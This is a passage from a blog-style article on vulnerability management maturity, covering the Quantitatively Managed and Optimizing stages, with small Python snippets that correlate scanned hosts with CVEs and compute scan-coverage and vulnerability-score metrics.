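    "10.0.1.21": {"CVE-2018-1111"},
    "10.0.2.5":  {"CVE-2017-0144"},
}

def hosts_vulnerable_to(cve_id: str) -> list:
    """Return every scanned host still carrying the CVE behind a detected exploit."""
    return sorted(host for host, cves in scan_state.items() if cve_id in cves)

# An exploit attempt matching CVE-2017-0144 is flagged at the external firewall:
print(hosts_vulnerable_to("CVE-2017-0144"))   # -> ['10.0.1.20', '10.0.2.5']
```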

The majority of organizations I’ve seen are somewhere between the Managed and the Defined stage. As I noted above, a very common problem is gaining the trust of the system administrators. If the solution that was initially chosen did not meet the requirements of the organization, it can be very difficult to regain their trust.

Stage 4: Quantitatively Managed

In the Quantitatively Managed stage of a vulnerability management program, the specific attributes of the program are quantifiable, and metrics are provided to the management team. The following are some vulnerability metrics that every organization should be tracking:

  • What is the percentage of the organization’s business systems that have not recently been scanned by the organization’s vulnerability management system?
  • What is the average vulnerability score of each of the organization’s business systems?
  • What is the total vulnerability score of each of the organization’s business systems?
  • How long does it take, on average, to completely deploy operating system software updates to a business system?
  • How long does it take, on average, to completely deploy application software updates to a business system?

These metrics can be viewed holistically as an organization or broken down by the various business units to see which business units are reducing their risk and which are lagging behind.
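As a small illustration, the sketch below computes two of the metrics above (scan coverage and average vulnerability score) over made-up asset data; the field names and numbers are assumptions:

```python
from datetime import datetime, timedelta

# Invented asset records standing in for scanner output.
assets = [
    {"host": "web01",  "last_scan": datetime(2018, 8, 1),  "vuln_score": 1250},
    {"host": "db01",   "last_scan": datetime(2018, 8, 3),  "vuln_score": 4800},
    {"host": "kiosk7", "last_scan": datetime(2018, 5, 20), "vuln_score": 900},
]

def pct_not_recently_scanned(assets, now, max_age_days=30):
    # Share of business systems with no scan inside the allowed window.
    stale = [a for a in assets if now - a["last_scan"] > timedelta(days=max_age_days)]
    return 100.0 * len(stale) / len(assets)

def average_score(assets):
    # Average vulnerability score across the organization's business systems.
    return sum(a["vuln_score"] for a in assets) / len(assets)

now = datetime(2018, 8, 15)
print(f"{pct_not_recently_scanned(assets, now):.1f}% of systems not scanned in the last 30 days")
print(f"Average vulnerability score per system: {average_score(assets):.0f}")
```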

Stage 5: Optimizing

In the Optimizing stage of a vulnerability management program, the metrics defined in the previous stage are targeted for improvement. Optimizing each of the metrics will ensure that the vulnerability management program continuously reduces the attack surface of the organization. The Information Security team should work with the management team to set attainable targets for the vulnerability management program. Once those targets are met consistently, new and more aggressive targets can be set with the goal of continuous process improvement.

Vulnerability management, combined with asset discovery, covers the top three of the Top 20 CIS Controls. Ensuring the ongoing maturation of your vulnerability management program is key to reducing the attack surface of your organization. If we can each reduce the surface the attackers have to work with, we can make this world more secure, one network at a time!

 

via:  tripwire